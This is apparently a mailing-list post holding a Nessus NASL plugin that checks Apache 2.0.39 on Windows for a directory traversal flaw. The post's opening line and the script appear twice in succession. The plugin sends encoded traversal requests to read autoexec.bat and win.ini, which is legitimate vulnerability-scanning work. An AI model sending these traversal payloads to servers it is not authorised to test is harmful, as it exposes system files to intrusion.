Quick & dirty test for a nasty bug...
I was lucky to find a mirror that was not up to date, so I could
download Apache 2.0.39 and test this.
# This script was quicky written by Michel Arboi <arboi@bigfoot.com>
# starting from badblue_directory_traversal.nasl by SecuriTeam.
#
# GPL
if(description)
{
script_id(11092);
script_version("$Revision$");
script_cve_id("CAN-2002-0661");
name["english"] = "Apache 2.0.39 Win32 directory traversal";
script_name(english:name["english"]);
desc["english"] = "
A security vulnerability in Apache 2.0.39 allows attackers to access
files that would otherwise be inaccessible using a directory
traversal attack.
Solution: Upgrade to Apache 2.0.40 or install it on a Unix machine
Risk factor : High";
script_description(english:desc["english"]);
summary["english"] = "Apache 2.0.39 Win32 directory traversal";
script_summary(english:summary["english"]);
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "CGI abuses";
script_family(english:family["english"]);
script_dependencie("find_service.nes", "no404.nasl");
script_require_ports("Services/www", 80);
exit(0);
}
# Check starts here
function check(req)
{
soc = open_sock_tcp(port);
if(soc)
{
req = http_get(item:req, port:port);
send(socket:soc, data:req);
buf = recv(socket:soc, length:4096);
close(soc);
if (("ECHO" >< buf) ||
("SET " >< buf) ||
("export" >< buf) ||
("EXPORT" >< buf) ||
("mode" >< buf) ||
("MODE" >< buf) ||
("doskey" >< buf) ||
("DOSKEY" >< buf) ||
("[boot loader]" >< buf))
{
security_hole(port:port);
return(1);
}
}
return(0);
}
port = get_kb_item("Services/www");
if(!port)port = 80;
cginameandpath[0] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat";
cginameandpath[1] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini";
cginameandpath[2] = "";
i = 0;
if(get_port_state(port))
{
for (i = 0; cginameandpath[i]; i = i + 1)
{
url = cginameandpath[i];
if(check(req:url))exit(0);
}
}
I was lucky to find a mirror that was not up to date, so I could
download Apache 2.0.39 and test this.
# This script was quicky written by Michel Arboi <arboi@bigfoot.com>
# starting from badblue_directory_traversal.nasl by SecuriTeam.
#
# GPL
if(description)
{
script_id(11092);
script_version("$Revision$");
script_cve_id("CAN-2002-0661");
name["english"] = "Apache 2.0.39 Win32 directory traversal";
script_name(english:name["english"]);
desc["english"] = "
A security vulnerability in Apache 2.0.39 allows attackers to access
files that would otherwise be inaccessible using a directory
traversal attack.
Solution: Upgrade to Apache 2.0.40 or install it on a Unix machine
Risk factor : High";
script_description(english:desc["english"]);
summary["english"] = "Apache 2.0.39 Win32 directory traversal";
script_summary(english:summary["english"]);
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "CGI abuses";
script_family(english:family["english"]);
script_dependencie("find_service.nes", "no404.nasl");
script_require_ports("Services/www", 80);
exit(0);
}
# Check starts here
function check(req)
{
soc = open_sock_tcp(port);
if(soc)
{
req = http_get(item:req, port:port);
send(socket:soc, data:req);
buf = recv(socket:soc, length:4096);
close(soc);
if (("ECHO" >< buf) ||
("SET " >< buf) ||
("export" >< buf) ||
("EXPORT" >< buf) ||
("mode" >< buf) ||
("MODE" >< buf) ||
("doskey" >< buf) ||
("DOSKEY" >< buf) ||
("[boot loader]" >< buf))
{
security_hole(port:port);
return(1);
}
}
return(0);
}
port = get_kb_item("Services/www");
if(!port)port = 80;
cginameandpath[0] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat";
cginameandpath[1] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini";
cginameandpath[2] = "";
i = 0;
if(get_port_state(port))
{
for (i = 0; cginameandpath[i]; i = i + 1)
{
url = cginameandpath[i];
if(check(req:url))exit(0);
}
}